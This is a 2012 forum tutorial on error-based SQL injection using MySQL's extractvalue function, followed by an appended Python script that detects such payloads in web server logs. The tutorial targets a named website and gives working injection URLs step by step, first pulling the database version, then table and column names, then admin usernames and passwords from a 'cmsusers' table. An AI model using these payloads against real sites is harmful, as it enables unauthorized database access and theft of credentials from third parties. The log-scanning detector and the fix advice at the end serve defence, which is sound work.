XPATH SQL Injection Tutorial 10-23-2012, 05:25 PM
XPATH SQL Injection
Index
- Intro.
- Getting the Version.
- How to get tables.
- How to get columns.
- Outro.
Intro.
Hi all on Anarchy Forums,
Today I will explain and show you how to hack a vulnerable site with the SQLi technique called XPATH.
So Xpath ( XML Path Language ) is to XML as SQL is to databases: XML applications need XPath to locate specific data within an XML document for further processing with other XML applications.
The things you will need for a successful Xpath injection:
- Vulnerable site ( http://www.twcpublicity.com/movie.php?id=75 )
- Text to hex converter ( http://www.swingnote.com/tools/texttohex.php )
Getting the Version
Now that we have found our SQLi vulnerable site, we need to know the database version the site uses.
We will do that with this Xpath code:
Code:
and extractvalue(rand(),concat(0x7e,version()))--
And our code in the link will look like this:
Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,version()))--
This will give us the version of the database server that the site uses.
Code:
XPATH syntax error: '~5.1.49-3-log'
Now that we have our version, let's get the tables from the site.
How to get tables
Finding the tables is very easy, you just need to use this code:
Code:
and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--
And that code will look like this in the url:
Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--
Now you should get your first table.
Ours is cmsusers.
Code:
XPATH syntax error: '~cmsusers
Now to explain something: if you don't get your desired table ( users, admin, etc. ) with limit 0,1, just raise the first number ( 0 ) until you get it.
Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))--
This is what we get with limit 1,1:
Code:
XPATH syntax error: '~marketing
So the first table was cmsusers and this is the second one ( marketing ).
You will use this limit whenever you are trying to find tables, columns, etc.
If you get a blank page or the normal page, then there are no more tables, columns, etc.
Now let's extract info from our table "cmsusers".
How to get columns
So now we have a table that might contain useful info.
It's time to get the columns from it.
This is the code:
Code:
and extractvalue(rand(),concat(0x7e,(select column_name from information_schema.columns where table_name=hex limit 0,1)))--
Before we continue, go to the text to hex converter ( linked at the top of the page )
and convert our table name cmsusers to hex.
NOTE: YOU NEED TO PUT 0x before the hex for it to work.
This is how it looks:
Code:
0x636d737573657273
And we put that hex in the url so it will look like this:
Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select column_name from information_schema.columns where table_name=0x636d737573657273 limit 0,1)))--
And now the first column is " id ":
Code:
XPATH syntax error: '~id'
So now raise the limit like we did when looking for more tables.
It's the same code but the limit is 1,1:
Code:
XPATH syntax error: '~name
" name " is our second column.
Raise it more, to 2,1:
Code:
XPATH syntax error: '~pword'
And our third column is " pword ".
When we raise it to 3,1 we get the normal page.
Now let's extract info from our columns.
The code will be:
Code:
and extractvalue(rand(),concat(0x7e,(select concat(yourColumn,0x7e,yourColumn) from yourTable limit 0,1)))--
Just replace yourColumn with the real column names and yourTable with the table name, of course.
So that code will look like this in the url:
Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select concat(name,0x7e,pword) from cmsusers limit 0,1)))--
Now you should get the admin info.
Outro.
That's it guys, I hope this will be helpful and that you learned something.
Sorry for my bad English, I am trying to make it understandable.
-crow
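The payloads walked through in the post leave a very recognisable trace in web server access logs: a MySQL XML function ( extractvalue or updatexml ) inside a query parameter, usually next to concat() or an information_schema lookup. The Python below is an added example for defenders, not code from the post; it scans constructed Apache-style log lines ( the IPs, timestamps and user agent are made up ) and flags requests that carry this error-based pattern after URL-decoding.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not from the
# original post); the attacker IP, timestamps and user agent are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Oct/2012:17:25:01 +0000] "GET /movie.php?id=75 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Oct/2012:17:25:09 +0000] "GET /movie.php?id=75%20and%20extractvalue(rand(),concat(0x7e,version()))-- HTTP/1.1" 200 318 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Oct/2012:17:25:40 +0000] "GET /movie.php?id=75+and+extractvalue%28rand%28%29%2Cconcat%280x7e%2C%28select+table_name+from+information_schema.tables+where+table_schema%3Ddatabase%28%29+limit+0%2C1%29%29%29-- HTTP/1.1" 200 318 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Oct/2012:17:26:02 +0000] "GET /search.php?q=concat+album+review HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# ip, method, request target and status from a combined-log line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of the error-based technique shown in the post: a MySQL XML
# function whose error message echoes attacker-controlled output, used
# together with concat() or an information_schema lookup.
XML_FUNC_RE = re.compile(r'\b(extractvalue|updatexml)\s*\(', re.I)
SUPPORT_RE = re.compile(r'\bconcat\s*\(|information_schema\.|\b0x7e\b', re.I)


def classify_request(target):
    """Return a reason string if the decoded request target carries an
    error-based SQLi payload, else None. The word 'concat' alone (see the
    search.php line) is not enough to alert on."""
    decoded = unquote_plus(target)
    if not XML_FUNC_RE.search(decoded):
        return None
    if SUPPORT_RE.search(decoded):
        return "error-based sqli: xml function with concat/information_schema"
    return "suspicious: xml error function in parameter"


def scan_log(text):
    """Return a list of (ip, path, reason) for every matching request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reason = classify_request(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("target").split("?")[0], reason))
    return hits


if __name__ == "__main__":
    for ip, path, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}: {reason}")
```

A 200 status on these hits is what to expect, since the error text is rendered into the normal page; the real fix on the application side is to cast or parameterise the id parameter and to stop showing database errors to users.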